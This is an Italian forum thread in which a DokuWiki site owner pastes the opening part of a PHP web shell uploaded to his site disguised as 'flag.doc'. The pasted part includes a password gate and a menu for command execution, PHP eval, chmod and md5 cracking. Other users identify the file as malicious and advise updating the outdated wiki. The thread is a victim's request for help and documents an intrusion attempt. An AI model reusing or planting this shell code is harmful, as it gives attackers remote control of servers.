Mi stanno hackerando il sito

[v1doc]

Ho un sito creato in PHP (dokuwiki), senza MySQL visto che usa dei file di testo per archiviare i dati.
Questa sera un utente di Libero (ho il suo IP) ha uploadato un file "flag.doc".
Non sono esperto ma a me sembra che sia uno script per trovare le password.
L'ho quindi tolto dal sito, volevo postarlo su questo forum ma è troppo lungo, comunque posso postare la prima parte:

Codice PHP:


<?php
error_reporting(0); //If there is an error, we'll show it, k?
$me = basename(__FILE__);
$cookiename = "wieeeee";

if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{
if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
{
$_POST['pass'] = md5($_POST['pass']);
}
if($_POST['pass'] == $password)
{
setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
}
reload();
}

if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
login();
die();
}
//
//Do not cross this line! All code placed after this block can't be executed without being logged in!
//
if(isset($_GET['p']) && $_GET['p'] == "logout")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
chdir($_GET['dir']);
}

$pages = array(
'cmd' => 'Execute Command',
'eval' => 'Evaluate PHP',
'mysql' => 'MySQL Query',
'chmod' => 'Chmod File',
'phpinfo' => 'PHPinfo',
'md5' => 'md5 cracker',
'headers' => 'Show headers',
'logout' => 'Log out'
);
//The header, like it?
$header = '<html>
<title>'.getenv("HTTP_HOST").' ~ Killer Hack</title>
<head>
<style>
td {
font-size: 12px;
font-family: verdana;
color: #33FF00;
background: #000000;
}
#d {
background: #003000;
}
#f {
background: #003300;
}
#s {
background: #006300;
}
#d:hover
{
background: #003300;
}
#f:hover
{
background: #003000;
}
pre {
font-size: 10px;
font-family: verdana;
color: #33FF00;
}
a:hover {
text-decoration: none;
}

input,textarea,select {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #33FF00;
background: #000000;
border-bottom-width: 1px;
border-bottom-color: #33FF00;
color: #33FF00;
border-top-color: #33FF00;
font-family: verdana;
border-right-width: 1px;
border-right-color: #33FF00;
}
hr {
color: #33FF00;
background-color: #33FF00;
height: 5px;
}
</style>
</head>
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
<table width=100%><td id="header" width=100%>
<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] ';
foreach($pages as $page => $page_name)
{
$header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
print $header;
$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';

La versione completa l'ho salvata qua:
http://www.megaupload.com/?d=FG7PWI07

Mi confermate che è un tentativo di hackerare il sito?
Cosa mi consigliate di fare?
Per adesso mi sono limitato a togliere i permessi di R/W e upload agli utenti anonimi (è un sito wiki e speravo nel contributo degli utenti per migliorarlo, evidentementi mi sbagliavo )

[AlexKidd]

è una shell in php, l'intento è sicuramente malevolo

però se il file è .doc, e non è incluso in nessun file .php, dovrebbe essere innocuo

[darkwolf]

Beh l'ultimo bug di smf riguardava la registrazione di uno spambot + upload di un avatar*.jpg contenente codice php che veniva eseguito (non so bene come) e infettava i files del forum.
Magari c'è un bug simile in dokuwiki e qualcuno stava tentando di sfruttarlo...
-
Edit: nel tuo sito vedo:

<meta name="generator" content="DokuWiki Release 2007-06-26" />

invece l'ultima release disponibile è la: dokuwiki-2009-02-14b cioè ben due anni di arretrati
Vedi quanti bug risolti nelle nuove release: http://www.dokuwiki.org/changes

[binarysun]

Io ricevo circa un 3 4 tentativi di attacco di questo genere AL GIORNO.
quais sempre sono semplici bot che tentano di passare un file remoto via variabile nella speranza che lo includa.

Come detto sopra aggiorna gli script e per il resto non pensarci.

Si confermo. Capita anche a me la stessa cosa :D

[v1doc]

Grazie per le info, questa sera aggiornerò il sito, spero che vada tutto liscio, l’ultima volta ho avuto dei problemi durante l’aggiornamento di dokuwiki.